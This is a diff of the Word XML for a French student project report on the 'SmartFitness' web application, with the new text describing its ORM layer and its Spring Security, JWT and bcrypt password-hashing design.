-              <v:shape id="Zone de texte 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:263.65pt;margin-top:18.7pt;width:65.25pt;height:36.75pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="0C213CFD" id="Zone de texte 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:263.65pt;margin-top:18.7pt;width:65.25pt;height:36.75pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2287,7 +2163,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52BAF1F0" wp14:editId="68E06D29">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>1510030</wp:posOffset>
@@ -2355,7 +2231,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="Zone de texte 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:118.9pt;margin-top:18.7pt;width:61.5pt;height:36.75pt;z-index:251670528;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="52BAF1F0" id="Zone de texte 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:118.9pt;margin-top:18.7pt;width:61.5pt;height:36.75pt;z-index:251670528;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2382,7 +2258,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666430" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F9A3421" wp14:editId="79CEA7E2">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666430" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04C8AA18" wp14:editId="21321949">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
                   <wp:posOffset>929005</wp:posOffset>
@@ -2458,7 +2334,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="1F9A3421" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:73.15pt;margin-top:22.05pt;width:41.25pt;height:32.25pt;z-index:251666430;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="04C8AA18" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:73.15pt;margin-top:22.05pt;width:41.25pt;height:32.25pt;z-index:251666430;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2485,7 +2361,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667455" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63C93DCD" wp14:editId="3A54D756">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667455" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A00D2B3" wp14:editId="2C9FD3F4">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
                   <wp:posOffset>4243070</wp:posOffset>
@@ -2563,7 +2439,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="63C93DCD" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:334.1pt;margin-top:18.3pt;width:59.25pt;height:30pt;z-index:251667455;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="1A00D2B3" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:334.1pt;margin-top:18.3pt;width:59.25pt;height:30pt;z-index:251667455;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2592,7 +2468,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A92F097" wp14:editId="42248621">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>4900930</wp:posOffset>
@@ -2659,7 +2535,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:385.9pt;margin-top:19.05pt;width:82.5pt;height:36.75pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="0A92F097" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:385.9pt;margin-top:19.05pt;width:82.5pt;height:36.75pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-width-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2685,7 +2561,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E3A7F73" wp14:editId="753821FC">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>1310005</wp:posOffset>
@@ -2760,7 +2636,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="057CBE21" wp14:editId="1D96BBF3">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>-4445</wp:posOffset>
@@ -2824,7 +2700,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="Zone de texte 4" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-.35pt;margin-top:19.15pt;width:69pt;height:36.75pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="057CBE21" id="Zone de texte 4" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-.35pt;margin-top:19.15pt;width:69pt;height:36.75pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -2853,7 +2729,7 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AB52974" wp14:editId="53040841">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>233680</wp:posOffset>
@@ -2929,7 +2805,7 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CBD7988" wp14:editId="6BEC4107">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>5234305</wp:posOffset>
@@ -3007,7 +2883,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61879596" wp14:editId="29829900">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>4224655</wp:posOffset>
@@ -3095,7 +2971,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="123451FF" wp14:editId="7C3A5190">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>909955</wp:posOffset>
@@ -3164,7 +3040,7 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64580EC6" wp14:editId="213BBFBD">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>2585085</wp:posOffset>
@@ -3244,7 +3120,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D89C188" wp14:editId="78D224B1">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C37682A" wp14:editId="44A3D711">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
                   <wp:posOffset>1880870</wp:posOffset>
@@ -3313,7 +3189,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="0D89C188" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:148.1pt;margin-top:9.9pt;width:158.25pt;height:30pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="0C37682A" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:148.1pt;margin-top:9.9pt;width:158.25pt;height:30pt;z-index:251677696;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p/>
@@ -3341,17 +3217,1234 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t xml:space="preserve"> mapping) est d’introduire une couche d’abstraction de toute la partie SQL en connectant le modèle objet de l’application à un modèle relationnel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Dans un troisième temps il s’agit de mettre en place la politique de sécurité de l’application. Selon Wikipédia, la sécurité informatique vise à empêcher l’utilisation non-autorisée, le mauvais usage, la modification ou le détournement</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>du système d’information.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:ind w:firstLine="705"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pour le projet </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>mapping</w:t>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>SmartFitness</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>) est d’introduire une couche d’abstraction de toute la partie SQL en connectant le modèle objet de l’application à un modèle relationnel.</w:t>
-      </w:r>
-    </w:p>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="222222"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sécurité de l’application repose sur le module Spring Security de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>SpringBoot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qui utilise JWT (Java Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) pour sécuriser les échanges REST entre le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>back-end</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>front-end</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et l’algorithme </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>bcrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pour le chiffrement des mots de passe en base de données. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Une première source de vulnérabilité concerne les informations confidentielles stockées en base de données notamment les mots de passe. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Pour crypter un mot de passe il existe des fonctions de hachage (MD5, SHA-1). Toutefois cette méthode est vulnérable aux attaques dites de collision aux attaques de type « </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>rainbow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tables » qui sont des tables pré calculées de hash permettant de trouver le mot de passe initial. Afin d’apporter un niveau de sécurité supérieur lors du stockage des mots de passe dans la base de données, le salage, combiné aux fonctions de hash, est utilisé comme technique de chiffrement, il consiste en l’insertion de préfixes et suffixes à l’intérieur des mots de passe. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="spellingerror"/>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Bcrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> est une implémentation algorithmique utilisée par Spring Security pour le chiffrement des mots de passe en base de données : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="eop"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="paragraph"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="normaltextrun"/>
+          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
